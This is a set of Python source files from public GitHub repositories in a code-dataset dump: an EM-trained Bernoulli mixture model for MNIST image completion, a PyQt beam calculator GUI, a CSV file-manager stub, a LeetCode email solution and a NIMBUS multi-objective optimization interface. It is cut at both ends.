bye')\n","repo_name":"sensemakersamsterdam/astroplant_explorer","sub_path":"explorer/mqtt_demos/2_mqtt_led_receiver.py","file_name":"2_mqtt_led_receiver.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"27294346237","text":"\nimport numpy as np\nimport pylab\nimport time\n\nimport util\n\nfrom scipy.special import gammaln\n\nIMAGE_DIM = 28\n\nTRAIN_IMAGES_FILE = 'train-images-idx3-ubyte'\nTRAIN_LABELS_FILE = 'train-labels-idx1-ubyte'\nTEST_IMAGES_FILE = 't10k-images-idx3-ubyte'\nTEST_LABELS_FILE = 't10k-labels-idx1-ubyte'\n\n\ndef beta_log_pdf_unnorm(theta, a, b):\n \"\"\"Unnormalized log PDF of the beta distribution.\"\"\"\n return (a - 1.) * np.log(theta) + (b - 1.) * np.log(1. - theta)\n\ndef dirichlet_log_pdf_unnorm(pi, a):\n \"\"\"Unnormalized log PDF of the Dirichlet distribution.\"\"\"\n return np.sum((a - 1.) * np.log(pi))\n\n\n\nclass Params(object):\n \"\"\"A class which represents the trainable parameters of the mixture model.\n - pi: the mixing proportions, represented as a K-dimensional array. It must be a\n probability distribution, i.e. the entries must be nonnegative and sum to 1.\n - theta: The Bernoulli parameters for each pixel in each mixture component. This is\n a K x D matrix, where rows correspond to mixture components and columns correspond\n to pixels. \"\"\"\n \n def __init__(self, pi, theta):\n self.pi = pi\n self.theta = theta\n\n def random_initialization(cls, num_components, num_pixels):\n init_pi = np.ones(num_components) / num_components\n init_theta = np.random.uniform(0.49, 0.51, size=(num_components, num_pixels))\n return Params(init_pi, init_theta)\n\nclass Prior(object):\n \"\"\"A class representing the priors over parameters in the mixture model.\n - a_mix: A scalar valued parameter for the Dirichlet prior over mixing proportions.\n - a_pixels and b_pixels: The scalar-valued parameters for the beta prior over the entries of\n theta. I.e., the entries of theta are assumed to be drawn i.i.d. from the distribution\n Beta(a_pixels, b_pixels). \"\"\"\n \n def __init__(self, a_mix, a_pixels, b_pixels):\n self.a_mix = a_mix\n self.a_pixels = a_pixels\n self.b_pixels = b_pixels\n\n def default_prior(cls):\n \"\"\"Return a Prior instance which has reasonable values.\"\"\"\n return cls(2., 2., 2.)\n\n @classmethod\n def uniform_prior(cls):\n \"\"\"Return a set of prior parameters which corresponds to a uniform distribution. Then\n MAP estimation is equivalent to maximum likelihood.\"\"\"\n return cls(1., 1., 1.)\n\nclass Model(object):\n \"\"\"A class implementing the mixture of Bernoullis model. The fields are:\n - prior: an Prior instance\n - params: a Params instance\"\"\"\n \n def __init__(self, prior, params):\n self.prior = prior\n self.params = params\n\n @classmethod\n def random_initialization(cls, prior, num_components, num_pixels):\n params = Params.random_initialization(num_components, num_pixels)\n return cls(prior, params)\n\n def expected_joint_log_probability(self, X, R):\n \"\"\"Compute the expected joint log probability, where the expectation is with respect to\n the responsibilities R. This is the objective function being maximized in the M-step.\n It's useful for verifying the optimality conditions in the M-step.\"\"\"\n \n total = 0.\n\n # Prior over mixing proportions\n total += dirichlet_log_pdf_unnorm(self.params.pi, self.prior.a_mix)\n\n # Prior over pixel probabilities\n total += np.sum(beta_log_pdf_unnorm(self.params.theta, self.prior.a_pixels, self.prior.b_pixels))\n\n # Probability of assignments\n total += np.sum(R * np.log(self.params.pi))\n \n # Matrix of log probabilities of observations conditioned on z\n # The (i, k) entry is p(x^(i) | z^(i) = k)\n log_p_x_given_z = np.dot(X, np.log(self.params.theta).T) + \\\n np.dot(1. - X, np.log(1. - self.params.theta).T)\n\n # Observation probabilities\n total += np.sum(R * log_p_x_given_z)\n\n return total\n\n def log_likelihood(self, X):\n \"\"\"Compute the log-likelihood of the observed data, i.e. the log probability with the\n latent variables marginalized out.\"\"\"\n \n # Matrix of log probabilities of observations conditioned on z\n # The (i, k) entry is p(x^(i) | z^(i) = k)\n log_p_x_given_z = np.dot(X, np.log(self.params.theta).T) + \\\n np.dot(1. - X, np.log(1. - self.params.theta).T)\n log_p_z_x = log_p_x_given_z + np.log(self.params.pi)\n\n # This is a numerically stable way to compute np.log(np.sum(np.exp(log_p_z_x), axis=1))\n log_p_x = np.logaddexp.reduce(log_p_z_x, axis=1)\n\n return log_p_x.sum()\n\n def update_pi(self, R):\n \"\"\"Compute the update for the mixing proportions in the M-step of the E-M algorithm.\"\"\"\n\n # implementing formulae for update_pi\n R_k_plus_1_times_alpha_minus_1 = (R.sum(axis=0) + 1) * (self.prior.a_mix - 1)\n \n pi_updated = R_k_plus_1_times_alpha_minus_1 / R_k_plus_1_times_alpha_minus_1.sum()\n \n return pi_updated\n \n \n def update_theta(self, X, R):\n \"\"\"Compute the update for the Bernoulli parameters in the M-step of the E-M algorithm.\"\"\"\n\n # implementing formulae for update_theta \n \n R_times_X = np.dot(np.transpose(R),X)\n R_times_1_minus_X = np.dot(np.transpose(R), 1 - X)\n term_a = R_times_X + self.prior.a_pixels - 1\n term_b = R_times_1_minus_X + self.prior.b_pixels - 1\n theta = term_a / (term_a + term_b)\n \n return theta\n\n\t\t\n def compute_posterior(self, X, M=None):\n \"\"\"Compute the posterior probabilities of the cluster assignments given the observations.\n This is used to compute the E-step of the E-M algorithm. It's also used in computing the\n posterior predictive distribution when making inferences about the hidden part of the image.\n It takes an optional parameter M, which is a binary matrix the same size as X, and determines\n which pixels are observed. (1 means observed, and 0 means unobserved.) \"\"\" \n\t\t\n if M is None:\n M = np.ones(X.shape, dtype=int)\n\n # Using X_modified and One_minus_X_modified,\n # we ensure that values for which X isn't observed, don't change the probabilities\n \n X_modified = np.zeros(np.shape(X))\n X_modified[np.where(M==1)] = X[np.where(M==1)]\n One_minus_X_modified = np.zeros(np.shape(X))\n One_minus_X_modified[np.where(M==1)] = (1 - X)[np.where(M==1)]\n \n log_p_x_given_z = np.dot(X_modified, np.log(self.params.theta).T) + \\\n np.dot(One_minus_X_modified, np.log(1. - self.params.theta).T)\n \n \n log_p_z_x = log_p_x_given_z + np.log(self.params.pi) \n \n # subtract the max of each row to avoid numerical instability\n log_p_z_x_shifted = log_p_z_x - log_p_z_x.max(1).reshape((-1, 1))\n\n # convert the log probabilities to probabilities and renormalize\n R = np.exp(log_p_z_x_shifted)\n R /= R.sum(1).reshape((-1, 1))\n return R\n\n def posterior_predictive_means(self, X, M):\n \"\"\"Compute the matrix of posterior predictive means for unobserved pixels given the observed\n pixels. The matrix M is a binary matrix the same size as X which determines which pixels\n are observed. (1 means observed, and 0 means unobserved.) You should return a real-valued\n matrix the same size as X. For all the entries corresponding to unobserved pixels, the value\n should determine the posterior probability that the pixel is on, conditioned on the observed\n pixels. It does not matter what values you assign for observed pixels, since those values\n aren't used for anything. Hint: the solution involves two very short lines, one of which is\n a call to self.compute_posterior.\"\"\"\n\n R = self.compute_posterior(X, M)\n X_returned = np.dot(R, self.params.theta)\n \n return X_returned\n\n \n def visualize_components(self, title=None):\n \"\"\"Visualize the learned components. Each of the images shows the Bernoulli parameters\n (probability of the pixel being 1) for one of the mixture components.\"\"\"\n\n pylab.figure('Mixture components')\n pylab.matshow(util.arrange(self.params.theta.reshape((-1, IMAGE_DIM, IMAGE_DIM))),\n fignum=False, cmap='gray')\n if title is None:\n title = 'Mixture components'\n pylab.title(title)\n pylab.draw()\n\n def visualize_predictions(self, X, M, title=None):\n \"\"\"Visualize the predicted probabilities for each of the missing pixels.\"\"\"\n\n P = self.posterior_predictive_means(X, M)\n imgs = np.where(M, X, P)\n obs = np.where(M, X, 0.3)\n\n pylab.figure('Observations')\n pylab.matshow(util.arrange(obs.reshape((-1, IMAGE_DIM, IMAGE_DIM))),\n fignum=False, cmap='gray')\n pylab.title('Observations')\n\n pylab.figure('Model predictions')\n pylab.matshow(util.arrange(imgs.reshape((-1, IMAGE_DIM, IMAGE_DIM))),\n fignum=False, cmap='gray')\n if title is None:\n title = 'Model predictions'\n pylab.title(title)\n pylab.draw()\n \n\ndef train_from_labels(prior=None, show=True):\n \"\"\"Fit the mixture model using the labeled MNIST data. There are 10 mixture components,\n one corresponding to each of the digit classes.\"\"\"\n \n X = util.read_mnist_images(TRAIN_IMAGES_FILE)\n y = util.read_mnist_labels(TRAIN_LABELS_FILE)\n X_test = util.read_mnist_images(TEST_IMAGES_FILE)\n num_data, num_pixels = X.shape\n\n if prior is None:\n prior = Prior.default_prior()\n model = Model.random_initialization(prior, 10, IMAGE_DIM**2)\n\n R = np.zeros((num_data, 10))\n R[np.arange(num_data), y] = 1.\n model.params.pi = model.update_pi(R)\n model.params.theta = model.update_theta(X, R)\n\n # mask which includes top half of pixels\n M = np.zeros(X.shape, dtype=int)\n M[:, :M.shape[1]//2] = 1\n\n if show:\n model.visualize_components()\n try:\n model.visualize_predictions(X[:64, :], M[:64, :])\n except:\n print('Posterior predictive distribution not implemented yet.')\n\n print('Training log-likelihood:', model.log_likelihood(X) / num_data)\n print('Test log-likelihood:', model.log_likelihood(X_test) / X_test.shape[0])\n\n return model\n \n \ndef train_with_em(num_components=100, num_steps=50, prior=None, draw_every=1):\n \"\"\"Fit the mixture model in an unsupervised fashion using E-M.\"\"\"\n \n X = util.read_mnist_images(TRAIN_IMAGES_FILE)\n X_test = util.read_mnist_images(TEST_IMAGES_FILE)\n num_data, num_pixels = X.shape\n\n if prior is None:\n prior = Prior.default_prior()\n model = Model.random_initialization(prior, num_components, num_pixels)\n\n # mask which includes top half of pixels\n M = np.zeros(X.shape, dtype=int)\n M[:, :M.shape[1]//2] = 1\n\n loglik_vals = []\n\n for i in range(num_steps):\n # E-step\n R = model.compute_posterior(X)\n\n # M-step\n model.params.pi = model.update_pi(R)\n model.params.theta = model.update_theta(X, R)\n\n loglik = model.log_likelihood(X) / num_data\n loglik_vals.append(loglik)\n\n if (i+1) % draw_every == 0:\n model.visualize_components()\n model.visualize_predictions(X[:64, :], M[:64, :])\n\n pylab.figure('Log-likelihood')\n pylab.clf()\n pylab.semilogx(np.arange(1, i+2), loglik_vals)\n pylab.title('Log-likelihood')\n pylab.xlabel('Number of E-M steps')\n pylab.draw()\n\n\n print('Final training log-likelihood:', model.log_likelihood(X) / num_data)\n print('Final test log-likelihood:', model.log_likelihood(X_test) / X_test.shape[0])\n\n return model\n\n\t\nif __name__ == '__main__':\n #train_from_labels()\n train_with_em()","repo_name":"019manpreet/image-completion","sub_path":"image-completion.py","file_name":"image-completion.py","file_ext":"py","file_size_in_byte":11979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71415869492","text":"import traceback\nimport os\nfrom PyQt5 import QtWidgets, uic, Qt\n\nfrom beamCalculator.Ui.Add_UDL_dialog_window import Add_UDL_dialog_window\nfrom beamCalculator.Ui.Add_beam_dialog_window import Add_beam_dialog_window\nfrom beamCalculator.Ui.Add_moment_dialog_window import Add_moment_dialog_window\nfrom beamCalculator.Ui.Add_support_dialog_window import Add_support_dialog_window\nfrom beamCalculator.Ui.Add_pointLoad_dialog_window import Add_pointLoad_dialog_window\nfrom beamCalculator.Ui.Rectangular_cross_section_dialog_window import Rectangular_cross_section_dialog_window\nfrom beamCalculator.Ui.Reset_dialog_window import Reset_dialog_window\nfrom beamCalculator.Ui.Show_dialog_error_messgae_box import showDialogErrorMessageBox\nfrom beamCalculator.Ui.Solution_summary_dialog_window import Solution_summary_dialog_window\nfrom beamCalculator.Ui.Square_cross_section_dialog_window import Square_cross_section_dialog_window\nfrom beamCalculator.Calculator.Material.SteelAISI1045 import SteelAISI1045\nfrom beamCalculator.Calculator.Material.CastIronGrade20 import CastIronGrade20\nfrom beamCalculator.Calculator.Beam.Beam import Beam\n\nfrom beamCalculator.definitions import UI_FILES_DIR\n\n\nclass Window(QtWidgets.QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n uic.loadUi(os.path.join(UI_FILES_DIR, 'beam_calculator_main_window.ui'), self)\n\n self.crossSectionComboBoxDialogWindowMappings = {0: None,\n 1: self.open_square_cross_section_dialog_window,\n 2: self.open_rectangular_cross_section_dialog_window}\n self.materialMappings = {0: None, 1: SteelAISI1045, 2: CastIronGrade20}\n\n # Properties of the users beam used for calculation\n self.user_beam_length = None\n self.user_beam_cross_section = None\n self.user_beam_loads = []\n self.user_beam_supports = []\n\n # Users beam object\n self.user_beam = None\n\n # Define click event actions for buttons\n self.addBeamButton.clicked.connect(self.open_add_beam_window)\n self.addSupportButton.clicked.connect(self.open_add_support_window)\n self.addPointLoadButton.clicked.connect(self.open_add_pointLoad_window)\n self.addMomentButton.clicked.connect(self.open_add_moment_window)\n self.addUDLButton.clicked.connect(self.open_add_udl_window)\n self.crossSectionSelectionComboBox.currentIndexChanged.connect(self.open_cross_section_dialog_window)\n self.solveButton.clicked.connect(self.solve)\n self.resetButton.clicked.connect(self.open_reset_dialog_window)\n\n def clear_user_beam_length(self):\n self.user_beam_length = None\n\n def clear_user_beam_cross_section(self):\n self.user_beam_cross_section = None\n self.crossSectionSelectionComboBox.setCurrentIndex(0)\n\n def clear_user_beam_point_loads(self):\n self.user_beam_loads = [l for l in self.user_beam_loads if l[0] != 'point']\n\n def clear_user_beam_moments(self):\n self.user_beam_loads = [l for l in self.user_beam_loads if l[0] != 'moment']\n\n def clear_user_beam_udl(self):\n self.user_beam_loads = [l for l in self.user_beam_loads if l[0] != 'udl']\n\n def clear_user_beam_supports(self):\n self.user_beam_supports.clear()\n\n def clear_user_beam_material(self):\n self.materialSelectionComboBox.setCurrentIndex(0)\n\n def open_add_beam_window(self): # Group into one open_dialog_window function with a dialog.UiFiles parameter\n self.dialog = Add_beam_dialog_window()\n self.dialog.exec_()\n self.user_beam_length = self.dialog.inputted_beam_length\n\n def open_add_support_window(self):\n self.dialog = Add_support_dialog_window()\n self.dialog.exec_()\n if is_all_support_data_present(self.dialog):\n self.user_beam_supports.append((self.dialog.support_type, self.dialog.support_location))\n\n def open_add_pointLoad_window(self):\n self.dialog = Add_pointLoad_dialog_window()\n self.dialog.exec_()\n if is_all_point_load_dialog_data_present(self.dialog):\n self.user_beam_loads.append(\n (\"point\", self.dialog.inputted_load_magnitude, self.dialog.inputted_load_location))\n\n def open_add_moment_window(self):\n self.dialog = Add_moment_dialog_window()\n self.dialog.exec_()\n if is_all_moment_dialog_data_present(self.dialog):\n self.user_beam_loads.append(\n (\"moment\", self.dialog.inputted_load_magnitude, self.dialog.inputted_load_location))\n\n def open_add_udl_window(self):\n self.dialog = Add_UDL_dialog_window()\n self.dialog.exec_()\n if is_all_udl_dialog_window_data_present(self.dialog):\n self.user_beam_loads.append((\"udl\", self.dialog.inputted_load_magnitude,\n self.dialog.inputted_load_start_location,\n self.dialog.inputted_load_end_location, self.dialog.inputted_load_order))\n\n def open_cross_section_dialog_window(self):\n idx = self.crossSectionSelectionComboBox.currentIndex()\n if idx != 0:\n self.crossSectionComboBoxDialogWindowMappings[idx]()\n\n def open_rectangular_cross_section_dialog_window(self):\n self.dialog = Rectangular_cross_section_dialog_window()\n self.dialog.exec_()\n self.user_beam_cross_section = self.dialog.get_user_cross_section()\n\n def open_square_cross_section_dialog_window(self):\n self.dialog = Square_cross_section_dialog_window()\n self.dialog.exec_()\n self.user_beam_cross_section = self.dialog.get_user_cross_section()\n\n def open_solution_summary_dialog_window(self):\n self.dialog = Solution_summary_dialog_window(self.user_beam)\n self.dialog.show()\n\n def open_reset_dialog_window(self):\n self.dialog = Reset_dialog_window(self)\n self.dialog.exec_()\n\n def get_selected_material(self):\n try:\n return self.materialMappings[self.materialSelectionComboBox.currentIndex()]()\n except:\n return None\n\n def get_selected_cross_section(self):\n pass\n\n def solve(self):\n try:\n if self.is_valid_beam_input():\n self.user_beam = Beam(self.user_beam_length, self.user_beam_cross_section, self.get_selected_material())\n self.user_beam.set_supports(self.user_beam_supports)\n self.user_beam.set_loads(self.user_beam_loads)\n self.user_beam.calculate()\n self.open_solution_summary_dialog_window()\n else:\n raise InvalidBeamInputException\n except:\n traceback.print_exc()\n showDialogErrorMessageBox()\n\n def is_valid_beam_input(self):\n if None in [self.user_beam_length, self.user_beam_cross_section, self.get_selected_material()] or len(\n self.user_beam_loads) == 0 or len(self.user_beam_supports) == 0:\n return False\n return True\n\n\ndef is_all_support_data_present(dialog):\n return not None in [dialog.support_type, dialog.support_location]\n\n\ndef is_all_point_load_dialog_data_present(dialog):\n return not None in [dialog.inputted_load_location, dialog.inputted_load_magnitude]\n\n\ndef is_all_moment_dialog_data_present(dialog):\n return not None in [dialog.inputted_load_location, dialog.inputted_load_magnitude]\n\n\ndef is_all_udl_dialog_window_data_present(dialog):\n return not None in [dialog.inputted_load_magnitude, dialog.inputted_load_start_location,\n dialog.inputted_load_end_location, dialog.inputted_load_order]\n\n\nclass InvalidBeamInputException(Exception):\n pass\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = Window()\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"mark2661/beamCalculator","sub_path":"Ui/beam_calculator_main_window.py","file_name":"beam_calculator_main_window.py","file_ext":"py","file_size_in_byte":7914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40775205918","text":"import sys\nimport csv\nimport datetime\nimport glob\n\nclass FileManager():\n date = datetime.datetime.strftime(datetime.datetime.now(),'%m-%d-%Y %H:%M:%S')\n location = 'D:\\\\Test\\\\'\n csvfile = 'manager.csv'\n \n def __init__(self):\n f = glob.glob(self.location+'*.csv')\n if self.csvfile in f:\n self.csv_read()\n else:\n self.csv_create()\n \n \n def checkdates(self,lastdate):\n pass\n \n def csv_create(self):\n file = open('DateManager.csv','wb')\n wr = csv.writer(file, quoting=csv.QUOTE_ALL)\n wr.writerow(self.date)\n \n \n def csv_read(self):\n csv_l = list()\n with open(self.csvfile,'rb') as file:\n csv_reader = csv.reader(file, delimiter=',')\n for row in csv_reader:\n csv_l.append(row)\n \n def csv_append(self):\n with open(self.csvfile,'wb') as file:\n csv_writer = csv.writer(file, quoting=csv.QUOTE_ALL)\n csv_writer.writerow(self.date)\n \n \n \n \n ","repo_name":"kmj442/FileManager","sub_path":"src/FileCheck.py","file_name":"FileCheck.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10348704686","text":"import numpy as np\nimport cv2 as cv\n\ninitial_image = np.array([[255,87], \n [150,30]])\n\nprint(\"\\nIN(8 bits):\")\nprint(initial_image)\nprint('\\n')\n\nscale = pow(2,8) / pow(2,11)\noutput11 = initial_image / scale\n# print(output11)\noutput11 = np.round_(output11)\n# print(output11)\noutput11 = output11*scale + scale/2\noutput11 = np.round_(output11) \n# print(\"OUT(11 bits):\")\n# print(output11)\n# print('\\n')\n\n# scale = pow(2,11) / pow(2,8)\n# output11 = initial_image * scale\n# output11 = np.round_(output11)\n# print(\"OUT(11 bits):\")\n# print(output11)\n# print('\\n')\n\n# scale = 32 / 255\n# output5 = initial_image * scale\n# output5 = np.round_(output5)\n# print(\"OUT(5 bits):\")\n# print(output5)\n# print('\\n')\n\n# scale = 8 / 255\n# output3 = initial_image * scale\n# output3 = np.round_(output3)\n# print(\"OUT(3 bits):\")\n# print(output3)\n# print()\n\n# ","repo_name":"Rekiichan/Exercises","sub_path":"b_5_test.py","file_name":"b_5_test.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22495671554","text":"class Solution(object):\n #O(n*k) Time | O(k) Space, where k is length of longest email and n is length of emails\n def numUniqueEmails(self, emails):\n \"\"\"\n :type emails: List[str]\n :rtype: int\n \"\"\"\n uniqueEmails = set()\n for email in emails:\n finalEmail = self.getFinalEmail(email)\n uniqueEmails.add(finalEmail)\n return len(uniqueEmails)\n \n # O(k) Time | O(k) Space, where k is length of email\n def getFinalEmail(self, email):\n localName = email.split('@')[0]\n domainName = email.split('@')[1]\n local = localName.split('+')[0].replace('.', '')\n return local + '@' + domainName\n","repo_name":"ayush-algoexpert/Leetcode","sub_path":"unique-email-addresses.py","file_name":"unique-email-addresses.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42242105957","text":"import os, sys\n\nfrom matplotlib.pyplot import step\np = os.path.abspath('.')\nsys.path.insert(1, p)\n\nfrom desdeo_interface.physical_interfaces.Interface import Interface\nfrom desdeo_interface.components.Button import Button\nfrom desdeo_interface.components.Potentiometer import Potentiometer\nfrom desdeo_interface.components.Master import Master\nfrom time import sleep\nimport numpy as np\nfrom typing import Union, Optional, List, Tuple\nfrom desdeo_problem.Problem import MOProblem\n\nclass NimbusInterface(Interface):\n \"\"\"\n A interface class for the Nimbus method\n Args:\n port (str): The serial port Arduino is connected\n button_pins (Union[np.array, List[int]]): digital pins that are connected to buttons\n potentiometer_pins (Union[np.array, List[int]]): analog pins that are connected to potentiometers\n rotary_encoder_pins (Union[np.ndarray, List[List[int]]]): pairs of digital pins that are connected to rotary encoders\n variable_bounds (Optional[np.ndarray]): Bounds for reference points, defaults to [0,1] for each variable\n \"\"\"\n\n def __init__(\n self,\n # master: Master,\n problem: MOProblem,\n # button_pins: Union[np.array, List[int]] = [],\n # potentiometer_pins: Union[np.array, List[int]] = [],\n # rotary_encoders_pins: Union[np.ndarray, List[List[int]]] = [],\n ):\n super().__init__(problem, True)\n \n def get_levels(self):\n print(\"Set aspiration levels and/or upper bounds\")\n return np.array(self.get_values(np.stack((self.problem.ideal, self.problem.nadir)), step_size = 0.05))\n \n def get_classification(self) -> str:\n \"\"\"\n Choose a classification for an objective from [\"<\", \"<=\", \"=\", \">=\", \"0\"]\n\n Returns:\n str: Chosen classification\n \"\"\"\n classification_options = [\"<\", \"<=\", \"=\", \">=\", \"0\"]\n return self.choose_from(classification_options)[1]\n \n # Maybe this could be with value handlers aswell\n def get_classifications(self) -> List[str]:\n \"\"\"\n Choose a classification for each objective \n\n Returns:\n List[str]: Chosen classifications\n \"\"\"\n classifications = []\n objective_count = self.problem.n_of_objectives\n for obj_index in range(objective_count):\n print(f\"Pick a classification level for objective at index {obj_index}\")\n classification = self.get_classification()\n classifications.append(classification)\n print(f\"Chosen classifications: {classifications}\")\n return classifications\n \n def specify_solution_count(self):\n \"\"\"\n Specify the amount of solutions to be calculated in the next step\n\n Returns:\n int: The amount of solutions to be calculated\n \"\"\"\n print(\"Select solution count\")\n return self.choose_value(1, 5)\n \n def pick_preferred_solution(self, solutions: np.ndarray):\n \"\"\"\n Let the DM pick a preferred solution from a list of solutions\n\n Returns:\n Any: The preferred solution\n \"\"\"\n return self.choose_from(solutions)[0]\n \n def should_continue(self):\n \"\"\"\n Should the method be continued or stopped\n\n Returns:\n bool: Whether or not to continue\n \"\"\"\n return self.confirmation(\"Continue?\")\n\n def try_another_classification(self):\n \"\"\"\n Does the DM want to try another set of classifications\n\n Returns:\n bool: Whether or not to change classifications\n \"\"\"\n return self.confirmation(\"Try another classification?\")\n \n def show_different_alternatives(self):\n \"\"\"\n Does the DM want to see different alternatives\n\n Returns:\n bool: Whether or not to see different alternatives\n \"\"\"\n return self.confirmation(\"Show alternatives?\")\n \n def save_solutions(self, solutions):\n \"\"\"\n Let the DM pick solutions they want to be saved\n\n Args:\n solutions (np.ndarray): Array of selectable solutions\n\n Returns:\n List: A list of the solutions the DM wants to save\n \"\"\"\n selected_solutions = self.choose_multiple(solutions, 0) # Get the solutions\n selected_solutions = list(map(lambda s: s[0], selected_solutions)) # Only get the indices\n return selected_solutions\n\n def choose_two_solutions(self, solutions):\n \"\"\"\n Let the DM choose two solutions for the intermediate solutions step\n\n Args:\n solutions (np.ndarray): Array of selectable solutions\n\n Returns:\n List: A list with the two chosen solutions\n \"\"\"\n selected_solutions = self.choose_multiple(solutions,2,2)\n selected_solutions = list(map(lambda s: s[0], selected_solutions))\n return selected_solutions\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n from desdeo_problem.Problem import MOProblem\n from desdeo_problem.Variable import variable_builder\n from desdeo_problem.Objective import _ScalarObjective\n\n def plot(request_type: str):\n plt.scatter(p_front[:, 0], p_front[:, 1], label=\"Pareto front\")\n plt.scatter(problem.ideal[0], problem.ideal[1], label=\"Ideal\")\n plt.scatter(problem.nadir[0], problem.nadir[1], label=\"Nadir\")\n if request_type == \"preferred\":\n for i, z in enumerate(preferred_request.content[\"objectives\"]):\n plt.scatter(z[0], z[1], label=f\"solution {i}\")\n elif request_type == \"save\":\n for i, z in enumerate(save_request.content[\"objectives\"]):\n plt.scatter(z[0], z[1], label=f\"solution {i}\")\n else:\n for i, z in enumerate(intermediate_request.content[\"objectives\"]):\n plt.scatter(z[0], z[1], label=f\"solution {i}\")\n plt.xlabel(\"f1\")\n plt.ylabel(\"f2\")\n plt.title(\"Approximate Pareto front of the Kursawe function\")\n plt.legend()\n plt.show()\n \n def f_1(xs: np.ndarray):\n xs = np.atleast_2d(xs)\n xs_plusone = np.roll(xs, 1, axis=1)\n return np.sum(-10*np.exp(-0.2*np.sqrt(xs[:, :-1]**2 + xs_plusone[:, :-1]**2)), axis=1)\n\n def f_2(xs: np.ndarray):\n xs = np.atleast_2d(xs)\n return np.sum(np.abs(xs)**0.8 + 5*np.sin(xs**3), axis=1)\n\n varsl = variable_builder(\n [\"x_1\", \"x_2\", \"x_3\"],\n initial_values=[0, 0, 0],\n lower_bounds=[-5, -5, -5],\n upper_bounds=[5, 5, 5],\n )\n\n f1 = _ScalarObjective(name=\"f1\", evaluator=f_1)\n f2 = _ScalarObjective(name=\"f2\", evaluator=f_2)\n\n nadir=np.array([-14, 0.5])\n ideal=np.array([-20, -12])\n \n problem = MOProblem(variables=varsl, objectives=[f1, f2], ideal=ideal, nadir=nadir)\n\n from desdeo_tools.solver import ScalarMethod\n from scipy.optimize import differential_evolution\n from desdeo_mcdm.interactive.NIMBUS import NIMBUS\n\n scalar_method = ScalarMethod(\n lambda x, _, **y: differential_evolution(x, **y), use_scipy=True, method_args={\"polish\": True, \"disp\": True}\n )\n\n method = NIMBUS(problem, scalar_method)\n\n interface = NimbusInterface(problem)\n\n \n from desdeo_mcdm.utilities.solvers import solve_pareto_front_representation\n\n p_front = solve_pareto_front_representation(problem, step=1.0)[1]\n print(p_front)\n\n plt.scatter(p_front[:, 0], p_front[:, 1], label=\"Pareto front\")\n plt.scatter(problem.ideal[0], problem.ideal[1], label=\"Ideal\")\n plt.scatter(problem.nadir[0], problem.nadir[1], label=\"Nadir\")\n plt.xlabel(\"f1\")\n plt.ylabel(\"f2\")\n plt.title(\"Approximate Pareto front of the Kursawe function\")\n plt.legend()\n plt.show()\n\n\n\n classification_request, plot_request = method.start()\n print(classification_request.content[\"objective_values\"])\n\n print(classification_request.content[\"message\"]) # Divide objective functions\n \n classifications = interface.get_classifications()\n levels = interface.get_levels()\n solution_count = interface.specify_solution_count()\n\n response = {\n \"classifications\": classifications,\n \"number_of_solutions\": solution_count,\n \"levels\": levels\n }\n\n classification_request.response = response\n\n save_request, plot_request = method.iterate(classification_request)\n next_request = \"save\"\n while True:\n if next_request == \"save\": # Then we need to specify indices for later viewing\n print(save_request.content['message'])\n objectives = save_request.content['objectives']\n print(objectives)\n saved_solutions = interface.save_solutions(objectives) # Get desired indices from the interface\n save_request.response = {\"indices\": saved_solutions}\n intermediate_request, plot_request = method.iterate(save_request)\n next_request = \"intermediate\"\n\n elif next_request == \"intermediate\": # See intermediate solutions?\n print(intermediate_request.content[\"message\"])\n solutions = intermediate_request.content[\"solutions\"]\n see_intermediate_solutions = interface.show_different_alternatives()\n if see_intermediate_solutions:\n sol = interface.choose_two_solutions(solutions)\n number_of_desired_solutions = interface.specify_solution_count()\n response = {\"number_of_desired_solutions\": number_of_desired_solutions, \"indices\": sol}\n intermediate_request.response = response\n save_request, plot_request = method.iterate(intermediate_request)\n next_request = \"save\"\n else:\n response = {\"number_of_desired_solutions\": 0, \"indices\": []}\n intermediate_request.response = response\n preferred_request, plot_request = method.iterate(intermediate_request)\n next_request = \"preferred\"\n \n elif next_request == \"preferred\":\n print(preferred_request.content[\"message\"])\n solutions = preferred_request.content[\"solutions\"]\n preferred_solution = interface.pick_preferred_solution(solutions)\n should_continue = interface.should_continue()\n preferred_request.response = {\"index\": preferred_solution, \"continue\": should_continue}\n if not should_continue:\n break\n classification_request, plot_request = method.iterate(preferred_request)\n next_request = \"classification\"\n \n elif next_request == \"classification\":\n print(classification_request.content[\"message\"])\n objective_count = len(problem.objectives)\n classifications = interface.get_classifications()\n levels = interface.get_levels()\n solution_count = interface.specify_solution_count()\n response = {\n \"classifications\": classifications,\n \"number_of_solutions\": solution_count,\n \"levels\": levels\n }\n classification_request.response = response\n save_request, plot_request = method.iterate(classification_request)\n next_request = \"save\"\n\n plot(next_request)\n\n response = {\n \"classifications\": classifications,\n \"number_of_solutions\": solution_count,\n \"levels\": levels\n }\n classification_request.response = response\n\n\n stop_request, plot_request = method.iterate(preferred_request)\n\n print(f\"Final decision variables: {stop_request.content['solution']}\")\n\n plt.scatter(p_front[:, 0], p_front[:, 1], label=\"Pareto front\")\n plt.scatter(problem.ideal[0], problem.ideal[1], label=\"Ideal\")\n plt.scatter(problem.nadir[0], problem.nadir[1], label=\"Nadir\")\n plt.scatter(stop_request.content[\"objective\"][0], stop_request.content[\"objective\"][1], label=f\"final solution\")\n plt.xlabel(\"f1\")\n plt.ylabel(\"f2\")\n plt.title(\"Approximate Pareto front of the Kursawe function\")\n plt.legend()\n 